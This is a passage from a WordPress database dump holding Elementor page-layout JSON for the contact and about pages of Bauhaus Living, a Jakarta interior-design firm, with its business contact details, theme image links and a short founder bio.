:0,\"bottom\":\"-60\",\"left\":0,\"isLinked\":false},\"z_index\":5},\"elements\":[{\"id\":\"11277b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":57.332,\"_inline_size_tablet\":100,\"_inline_size_mobile\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"80\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"25d4298\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us\",\"title\":\"Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!\",\"description\":\"Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.\\n\\n\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"2fd982e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"label\":\"Have any question?\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"021 22544768\",\"phone_address\":\"+021 22544768\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"849b928\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-letter\",\"library\":\"ovaicon\"},\"label\":\"Write email\",\"items_info\":[{\"email_label\":\"info@bauhausliving.com\",\"email_address\":\"info@bauhausliving.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"9baa065\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-pin\",\"library\":\"ovaicon\"},\"label\":\"Visit anytime \",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\",\"link_label\":\"BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/aDtccje1G7M53R3E8\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"3e7e3bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":42,\"_inline_size_tablet\":100,\"align\":\"center\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg.png\",\"id\":800,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"top right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9fb7201\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"logo_opacity_desktop\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"logo_opacity_mobile\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"ova_logo\"},{\"id\":\"62a6664\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us \",\"title\":\"Write anytime\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"color_title\":\"#FFFFFF\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"21ccb5c\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"44\",\"left\":\"0\",\"isLinked\":false},\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\",\"shortcode\":\"[contact-form-7 id=\\\"884\\\" title=\\\"Contact page\\\"]\",\"_css_classes\":\"ova-contact-page\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0ec9a68\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\"},\"elements\":[{\"id\":\"fc5198b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080f03e\",\"elType\":\"widget\",\"settings\":{\"address\":\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"height\":{\"unit\":\"px\",\"size\":475,\"sizes\":[]},\"height_tablet\":{\"unit\":\"px\",\"size\":350,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":107,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"zoom\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_transition\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false}]'),(4095,4903,'_elementor_page_assets','a:0:{}'),(4096,4903,'_elementor_pro_version','3.8.1'),(4097,4904,'_wp_page_template','elementor_header_footer'),(4098,4904,'_elementor_edit_mode','builder'),(4099,4904,'_elementor_template_type','wp-page'),(4100,4904,'_elementor_version','3.8.1'),(4101,4904,'_elementor_data','[{\"id\":\"cf0a9af\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-60\",\"left\":0,\"isLinked\":false},\"z_index\":5},\"elements\":[{\"id\":\"11277b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":57.332,\"_inline_size_tablet\":100,\"_inline_size_mobile\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"80\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"25d4298\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us\",\"title\":\"Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!\",\"description\":\"Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.\\n\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"2fd982e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"label\":\"Have any question?\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"021 22544768\",\"phone_address\":\"+021 22544768\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"849b928\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-letter\",\"library\":\"ovaicon\"},\"label\":\"Write email\",\"items_info\":[{\"email_label\":\"info@bauhausliving.com\",\"email_address\":\"info@bauhausliving.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"9baa065\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-pin\",\"library\":\"ovaicon\"},\"label\":\"Visit anytime \",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\",\"link_label\":\"BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/aDtccje1G7M53R3E8\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"3e7e3bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":42,\"_inline_size_tablet\":100,\"align\":\"center\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg.png\",\"id\":800,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"top right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9fb7201\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"logo_opacity_desktop\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"logo_opacity_mobile\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"ova_logo\"},{\"id\":\"62a6664\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us \",\"title\":\"Write anytime\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"color_title\":\"#FFFFFF\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"21ccb5c\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"44\",\"left\":\"0\",\"isLinked\":false},\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\",\"shortcode\":\"[contact-form-7 id=\\\"884\\\" title=\\\"Contact page\\\"]\",\"_css_classes\":\"ova-contact-page\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0ec9a68\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\"},\"elements\":[{\"id\":\"fc5198b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080f03e\",\"elType\":\"widget\",\"settings\":{\"address\":\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"height\":{\"unit\":\"px\",\"size\":475,\"sizes\":[]},\"height_tablet\":{\"unit\":\"px\",\"size\":350,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":107,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"zoom\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_transition\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false}]'),(4102,4904,'_elementor_page_assets','a:0:{}'),(4103,4904,'_elementor_pro_version','3.8.1'),(4105,4905,'_wp_page_template','elementor_header_footer'),(4106,4905,'_elementor_edit_mode','builder'),(4107,4905,'_elementor_template_type','wp-page'),(4108,4905,'_elementor_version','3.8.1'),(4109,4905,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/file-1.jpg\",\"id\":4884,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"John Alan\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.<\\/p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi perencanaan & interior design\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"ced22e0\"},{\"text\":\"Penyusunan Rencana Anggaran Belanja\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Produksi furniture dan pekerjaan sipil\",\"selected_icon\":{\"value\":\"fas 